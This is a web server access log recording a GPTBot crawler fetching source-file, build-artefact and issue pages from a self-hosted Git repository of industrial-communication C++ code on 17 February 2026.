192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp?display=source" [Client 74.7.227.38] [Length 12767] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" -[17/Feb/2026:18:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12273] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:18:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12861] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12778] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12774] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12376] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12773] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12865] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12377] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12790] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12774] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12862] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12862] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12863] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11341] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/status.json" -[17/Feb/2026:18:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 11752] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:04:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11413] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11417] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13197] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:04:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13196] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2fReadMe.md" [Client 74.7.227.38] [Length 23924] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:18:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" -[17/Feb/2026:18:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 12505] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" -[17/Feb/2026:18:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:18:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 10957] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:18:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:18:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11153] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:18:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12524] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:04:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:18:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:18:04:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:18:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:18:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache?display=source" [Client 74.7.227.38] [Length 12522] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:18:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache?display=rendered" [Client 74.7.227.38] [Length 11181] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:18:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 4258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:18:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11838] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11805] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:18:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11411] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12526] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:18:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11444] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr 